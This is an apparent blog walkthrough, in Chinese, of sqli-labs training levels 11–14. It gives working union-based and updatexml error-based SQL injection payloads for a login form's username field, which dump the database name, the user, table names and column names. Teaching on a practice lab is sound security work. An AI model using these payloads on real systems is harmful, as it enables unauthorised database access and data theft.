sqli-labs 靶场 less-11~14 第十一关、第十二关、第十三关、第十四关详解:联合注入、错误注入

复制代码
SQLi-Labs是一个用于学习和练习SQL注入漏洞的开源应用程序。通过它,我们可以学习如何识别和利用不同类型的SQL注入漏洞,并了解如何修复和防范这些漏洞。

Less 11

复制代码
SQLI DUMB SERIES-11

判断注入点

尝试在用户名这个字段实施注入,且试出SQL语句闭合方式为单引号:

同时输入正确的用户名就可以查看到数据,那么我们就只可以在这个uname位置直接注入。

python 复制代码
uname=admin' -- &passwd=1

实施注入

获取数前数据库的数据名和用户名

sql 复制代码
uname=0' union select database(),user() from dual -- &passwd=1

获取当前数据库的表名:

sql 复制代码
uname=0' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() -- &passwd=1

获取user表的列名:

python 复制代码
uname=0' union select 1,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users' -- &passwd=1

Less 12

复制代码
SQLI DUMB SERIES-12

通过输入判断出查询字符串的闭合方式为")

同样通过这一个点获取数据库名和用户名。

python 复制代码
uname=0") union select database(),user() from dual -- &passwd=1

Less 13

复制代码
SQLI DUMB SERIES-13

判断注入点

SQL语句错误,提示异常。

sql 复制代码
uname=0'&passwd=1

正常输入结果显示成功,不过没有任何提示内容。

sql 复制代码
uname=admin') -- &passwd=1

如果是这样的话,那就只能通过错误信息来获取数据了,如下所示

sql 复制代码
uname=0') and updatexml(1,concat(user()),1) -- &passwd=1

实施注入

sql 复制代码
uname=0') and updatexml(1,concat('~',(database())),1) -- &passwd=1

获取当前数据库所有的表名

sql 复制代码
uname=0') and updatexml(1,concat('~',(select group_concat(table_name) from information_schema.tables where table_schema='security')),1) -- &passwd=1

获取user表所有的列名

sql 复制代码
uname=0') and updatexml(1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),1) -- &passwd=1

到此注入成功

Less 14

复制代码
SQLI DUMB SERIES-14

判断注入点

测试双引号报错。

sql 复制代码
uname=admin "&passwd=1

然后经测试采用双引号加注释符就可以验证登录成功。

sql 复制代码
uname=admin "-- &passwd=1

但这样还不能获取数据,则判断这个注入方式为错误注入。

通过updatexml方法即可成功注入

sql 复制代码
uname=admin " and updatexml(1,user(),3)-- &passwd=1

实施注入

获取数据库名

sql 复制代码
uname=admin " and updatexml(1,concat('~',database()),3)-- &passwd=1

获取当前数据库所有的表名

sql 复制代码
uname=admin " and updatexml(1,(select group_concat(table_name) from information_schema.tables where table_schema='security'),3)-- &passwd=1

获取user表所有的列名

sql 复制代码
uname=admin " and updatexml(1,concat('~',(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')),3)-- &passwd=1

系列文章

相关推荐
攀登的牵牛花5 小时前
前端向架构突围系列 - 状态数据设计 [8 - 4]:有限状态机 (FSM) 在复杂前端逻辑中的应用
前端
Lsx_5 小时前
前端视角下认识 AI Agent 和 LangChain
前端·人工智能·agent
IvorySQL5 小时前
PostgreSQL 分区表的 ALTER TABLE 语句执行机制解析
数据库·postgresql·开源
·云扬·5 小时前
MySQL 8.0 Redo Log 归档与禁用实战指南
android·数据库·mysql
野生技术架构师5 小时前
SQL语句性能优化分析及解决方案
android·sql·性能优化
IT邦德5 小时前
Oracle 26ai DataGuard 搭建(RAC到单机)
数据库·oracle
我是伪码农5 小时前
Vue 智慧商城项目
前端·javascript·vue.js
不认输的西瓜5 小时前
fetch-event-source源码解读
前端·javascript
用户39051332192885 小时前
前端性能杀手竟然不是JS?图片优化才是绝大多数人忽略的"降本增效"方案
前端